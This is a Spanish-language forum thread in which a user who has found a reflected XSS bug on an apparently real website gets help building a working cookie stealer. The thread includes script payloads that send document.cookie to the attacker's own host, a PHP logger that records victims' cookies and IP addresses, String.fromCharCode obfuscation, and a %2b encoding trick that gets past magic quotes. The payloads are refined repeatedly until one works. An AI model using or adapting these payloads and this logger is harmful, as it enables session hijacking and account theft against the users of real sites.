|
Título: XSS Help!!! Publicado por: [{O_o}] en 10 Febrero 2010, 17:15 pm Encontre un bug de xss en una pagina web al poner "><scritp>alert(document.cookie)</script> me da la cookie perfectamente pero al hacer esto
"><scritp>window.location="http://mysite.us/c.php?cookie="+document.cookie;</script> no me caputara la cookie ya intente mandar solo a la web y lo hace perfectamente el problema esta parece que no me concatena el document.cookie alguna ayuda!!! Título: Re: XSS Help!!! Publicado por: tragantras en 10 Febrero 2010, 17:20 pm esto va en nivel web... XD
prueba con document.location en lugar de window.location pD: de javascript no tengo demasiada idea pero es lo k e visto @ google :/ un saludo! Título: Re: XSS Help!!! Publicado por: [{O_o}] en 10 Febrero 2010, 17:27 pm De hecho si pido disculpa no me di cuenta por ponertlo aqui.
"><script>document.location="http://mysite.us/c.php?cookie="+ document.cookie;</script> ya tambien lo e tratado y nada. Título: Re: XSS Help!!! Publicado por: Shell Root en 10 Febrero 2010, 19:06 pm En el primer codigo, no te funko porque pusiste
Código: "><scritp>.... Código: "><script>.... Título: Re: XSS Help!!! Publicado por: [{O_o}] en 10 Febrero 2010, 19:12 pm Shell Root
"><script>document.location='http://mysite.us/c.php?cookie='+ document.cookie;</script> Tampoco funciono!! no me manda al link es como que no concatena la intruccion del javascript es decir al poner esto en address bar http://url_victima.com/empty_personal.phtml?r="><script>window.location='http://myweb.com/c.php?cookie='+document.cookie;</script> no me manda a la pagina web del javascript a donde esta el cookie stealer pero si le quito la concatanacion es decir URL + document.cookie; http://url_victima.com/empty_personal.phtml?r="><script>window.location='http://myweb.com/c.php?cookie=';</script> funciona entoces el problema esta en el + document.cookie; que no me concatena. Título: Re: XSS Help!!! Publicado por: Castg! en 10 Febrero 2010, 21:24 pm que raro :-\, nose, proba con self.location
Título: Re: XSS Help!!! Publicado por: [{O_o}] en 10 Febrero 2010, 21:47 pm http://vitima.com/01109417885/empty_personal.phtml?r="><script>selft.location='http://mypage.com/c.php?cookie='+document.cookie;</script>
Nada no funciona y sigue pasando lo mismo si le quito el + document.cookie funciona normal. Título: Re: XSS Help!!! Publicado por: ~ Yoya ~ en 10 Febrero 2010, 22:09 pm Haber, muestra lo siguiente:
El codigo php para guardar el archivo de texto con las cookie. Muestra los permiso del archivo php y los permiso de la carpeta donde esta este. Muestra una captura aver si el XSS funciona correctamente. Título: Re: XSS Help!!! Publicado por: ~ Yoya ~ en 10 Febrero 2010, 22:25 pm Ps bueno ya tengo la solución, estaba probando lo y lo solucione con la función String.fromCharCode() de javascript. ok bueno mira.
Primero vamos encodear el codigo javascript a ASCII , que sera este: Código: <script>window.location="http://www.google.com";</script> Código: 60, 115, 99, 114, 105, 112, 116, 62, 119, 105, 110, 100, 111, 119, 46, 108, 111, 99, 97, 116, 105, 111, 110, 61, 34, 104, 116, 116, 112, 58, 47, 47, 119, 119, 119, 46, 103, 111, 111, 103, 108, 101, 46, 99, 111, 109, 34, 59, 60, 47, 115, 99, 114, 105, 112, 116, 62 Entonce la XSS quedara asi Código: "><script>document.write(String.fromCharCode( Solo ponerlo en el navegador y te redireccionara a google, puedes usar esta herramienta online para que encodes tu codigo a ASCII: Herramienta (http://jdstiles.com/java/cct.html) Saludos espero que funcione. Título: Re: XSS Help!!! Publicado por: [{O_o}] en 10 Febrero 2010, 22:38 pm Esa parte funciona correctamente la parte que no me funciona es al agregarle el + document.cookie; al javascript voy intentar con el encode.
Título: Re: XSS Help!!! Publicado por: [{O_o}] en 10 Febrero 2010, 22:49 pm chmod 777 c.php
PHP SCRIPT: <?php $cookie = urldecode($_GET['c']); $fp = fopen("log.txt", "a"); $cookie = $cookie . ": ".$_SERVER['REMOTE_ADDR']." at ".date("r",time())."\n"; fwrite($fp, "$cookie \n"); fclose($fp); header("Location: http://google.com "); ?> XSS BUG URL: http://victima.com?r="><script>selft.location='http://url.com/c.php?c='+document.cookie;</script> LOG.TXT: pero si pongo http://victima?r="><script>selft.location='http://url.com/c.php?c=';</script> LOG.TXT: : x.x.x.x at Wed, 10 Feb 2010 10:56:34 -0400 Gracias! Título: Re: XSS Help!!! Publicado por: ~ Yoya ~ en 10 Febrero 2010, 22:59 pm Tio hacerlo con el String.fromCharCode() y veras que funcionara y cuentas.
Título: Re: XSS Help!!! Publicado por: Castg! en 10 Febrero 2010, 23:00 pm no creo q te convenga poner la url original.. :S cambiala por **** ;)
Título: Re: XSS Help!!! Publicado por: [{O_o}] en 10 Febrero 2010, 23:02 pm Solo la puse asi para que ustedes trataran!!!
Título: Re: XSS Help!!! Publicado por: ~ Yoya ~ en 10 Febrero 2010, 23:05 pm Tranquilo man, anda y usa String.fromCharCode(), aveces es mejor que pongas la url.
Título: Re: XSS Help!!! Publicado por: [{O_o}] en 10 Febrero 2010, 23:09 pm No funciona tio
con el code tratat de agregarle el + document.cookie; al ejemplo que me diste a ver si te junciona. Gracias Título: Re: XSS Help!!! Publicado por: ~ Yoya ~ en 10 Febrero 2010, 23:14 pm No te lo puedo agregar correctamente porque no se la direccion de tu web, pon lo que pusistee y miro que hiziste mal
Título: Re: XSS Help!!! Publicado por: [{O_o}] en 10 Febrero 2010, 23:16 pm "><script>document.write(String.fromCharCode(60, 115, 99, 114, 105, 112, 116, 62, 119, 105, 110, 100, 111, 119, 46, 108, 111, 99, 97, 116, 105, 111, 110, 61, 34, 104, 116, 116, 112, 58, 47, 47, 105, 109, 117, 115, 97, 46, 117, 115, 47, 99, 46, 112, 104, 112, 63, 99, 61, 34, 43, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 111, 111, 107, 105, 101, 59, 60, 115, 99, 114, 105, 112, 116, 62))</script>
esto fue lo que puse y no salio nada Título: Re: XSS Help!!! Publicado por: ~ Yoya ~ en 10 Febrero 2010, 23:38 pm Bueno este debe funcionar:
Código: "><script>document.write(String.fromCharCode(60, 115, 99, 114, 105, 112, 116, 62, 119, 105, 110, 100, 111, 119, 46, 108, 111, 99, 97, 116, 105, 111, 110, 61, 34, 104, 116, 116, 112, 58, 47, 47, 105, 109, 117, 115, 97, 46, 117, 115, 47, 99, 46, 112, 104, 112, 63, 99, 61, 34, 43, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 111, 111, 107, 105, 101, 59, 60, 47, 115, 99, 114, 105, 112, 116, 62))</script> Título: Re: XSS Help!!! Publicado por: [{O_o}] en 10 Febrero 2010, 23:49 pm Ya mucha gracias lo hice con unicode para la url y me funciono perfectamente jijiji
Título: Re: XSS Help!!! Publicado por: ~ Yoya ~ en 10 Febrero 2010, 23:59 pm Ok, no pasa nada, pero yo creo que se porque no podias hacerlo, ps pueda ser que el servidor tuviera On las magic quotes gpc (http://www.php-es.com/ref.info.html#ini.magic-quotes-gpc) que te escapaba las comillas dobles y simples por barras invertidas, siempre trata de ver el codigo de fuente y mira que pasa con lo que vas inyectando.
Título: Re: XSS Help!!! Publicado por: [{O_o}] en 11 Febrero 2010, 00:26 am yo lo prove concatenando el la url + el cookie
de este manera "miurl.com"+document.cookie; y despues probe "miurl.com"%2bdocument.cookie; y asi si funciona! es por el magic quote. gracias no mantenemos en conctato! Título: Re: XSS Help!!! Publicado por: ~ Yoya ~ en 11 Febrero 2010, 00:31 am Bueno tambien, eso se llama url encoding, pero si alguna vez en cuentra otro XSS y no te funciona encodear la url por, ps te toca usar String.fromCharCode()
|